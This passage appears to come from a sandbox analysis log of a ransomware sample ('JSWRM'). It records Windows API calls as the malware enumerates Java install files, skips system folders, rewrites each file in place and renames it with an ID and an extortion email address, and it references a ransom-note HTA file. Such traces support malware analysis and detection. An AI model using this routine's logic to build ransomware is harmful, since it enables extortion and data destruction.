ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2371c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="THIRDPARTYLICENSEREADME.txt", cAlternateFileName="THIRDP~2.TXT")) returned 1 [0071.734] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME.txt", lpString2=".") returned 1 [0071.734] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME.txt", lpString2="..") returned 1 [0071.734] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME.txt", lpString2="...") returned 1 [0071.734] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME.txt", lpString2="windows") returned -1 [0071.734] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME.txt", lpString2="recovery") returned 1 [0071.734] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME.txt", lpString2="perflogs") returned 1 [0071.734] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME.txt", lpString2="documents and settings") returned 1 [0071.734] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME.txt", lpString2="$RECYCLE.BIN") returned 1 [0071.734] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME.txt", lpString2="system volume information") returned 1 [0071.734] lstrcmpiW (lpString1="THIRDPARTYLICENSEREADME.txt", lpString2="msocache") returned 1 [0071.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0071.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THIRDPARTYLICENSEREADME.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0071.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0071.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THIRDPARTYLICENSEREADME.txt", cchWideChar=27, lpMultiByteStr=0x2410d8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="THIRDPARTYLICENSEREADME.txt", lpUsedDefaultChar=0x0) returned 27 [0071.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0071.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0071.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THIRDPARTYLICENSEREADME.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0071.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0071.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THIRDPARTYLICENSEREADME.txt", cchWideChar=27, lpMultiByteStr=0x240ef8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="THIRDPARTYLICENSEREADME.txt", lpUsedDefaultChar=0x0) returned 27 [0071.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0071.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0071.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0071.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0071.747] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0071.747] GetFileSizeEx (in: hFile=0x298, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=145180) returned 1 [0071.747] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x23710) returned 0x24c1d0 [0071.747] ReadFile (in: hFile=0x298, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x23710, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ef6c*=0x23710, lpOverlapped=0x0) returned 1 [0071.806] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.806] WriteFile (in: hFile=0x298, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x23710, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ef68*=0x23710, lpOverlapped=0x0) returned 1 [0071.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0071.808] CloseHandle (hObject=0x298) returned 1 [0071.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0071.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0071.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0071.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0071.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0071.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0071.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.809] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0071.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0071.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0071.810] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0071.810] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3bb, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="Welcome.html", cAlternateFileName="WELCOM~1.HTM")) returned 1 [0071.811] lstrcmpiW (lpString1="Welcome.html", lpString2=".") returned 1 [0071.811] lstrcmpiW (lpString1="Welcome.html", lpString2="..") returned 1 [0071.811] lstrcmpiW (lpString1="Welcome.html", lpString2="...") returned 1 [0071.811] lstrcmpiW (lpString1="Welcome.html", lpString2="windows") returned -1 [0071.811] lstrcmpiW (lpString1="Welcome.html", lpString2="recovery") returned 1 [0071.811] lstrcmpiW (lpString1="Welcome.html", lpString2="perflogs") returned 1 [0071.811] lstrcmpiW (lpString1="Welcome.html", lpString2="documents and settings") returned 1 [0071.811] lstrcmpiW (lpString1="Welcome.html", lpString2="$RECYCLE.BIN") returned 1 [0071.811] lstrcmpiW (lpString1="Welcome.html", lpString2="system volume information") returned 1 [0071.811] lstrcmpiW (lpString1="Welcome.html", lpString2="msocache") returned 1 [0071.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0071.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Welcome.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0071.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Welcome.html", cchWideChar=12, lpMultiByteStr=0x345f2a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Welcome.html", lpUsedDefaultChar=0x0) returned 12 [0071.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0071.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0071.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Welcome.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0071.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Welcome.html", cchWideChar=12, lpMultiByteStr=0x345f278, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Welcome.html", lpUsedDefaultChar=0x0) returned 12 [0071.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0071.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0071.811] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0071.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.811] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0071.811] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0071.812] GetFileSizeEx (in: hFile=0x298, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=955) returned 1 [0071.812] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3b0) returned 0x203550 [0071.812] ReadFile (in: hFile=0x298, lpBuffer=0x203550, nNumberOfBytesToRead=0x3b0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x3b0, lpOverlapped=0x0) returned 1 [0071.815] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.815] WriteFile (in: hFile=0x298, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x3b0, lpOverlapped=0x0) returned 1 [0071.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0071.815] CloseHandle (hObject=0x298) returned 1 [0071.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0071.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0071.815] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0071.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0071.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217250 [0071.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0071.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0071.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217250 | out: hHeap=0x1e0000) returned 1 [0071.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.815] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\Welcome.html.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\welcome.html.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0071.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0071.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0071.816] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3bb, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="Welcome.html", cAlternateFileName="WELCOM~1.HTM")) returned 0 [0071.816] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0071.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0071.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0071.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0071.816] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x200811e2, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x200811e2, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x200811e2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0071.816] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0071.816] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0071.816] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0071.816] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0071.816] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0071.816] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0071.816] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0071.816] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0071.816] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0071.816] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0071.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0071.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0071.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0071.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0071.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0071.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0071.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0071.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0071.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0071.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0071.817] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x200811e2, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x200811e2, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x200811e2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0071.817] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0071.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0071.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0071.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0071.817] FindNextFileW (in: hFindFile=0x231fc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ed63c60, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1ed63c60, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1ed63c60, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0071.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0071.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0071.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0071.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0071.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0071.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0071.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0071.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0071.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0071.817] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0071.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0071.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0071.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0071.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0071.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0071.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0071.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0071.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0071.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0071.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0071.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0071.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0071.818] FindNextFileW (in: hFindFile=0x231fc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, 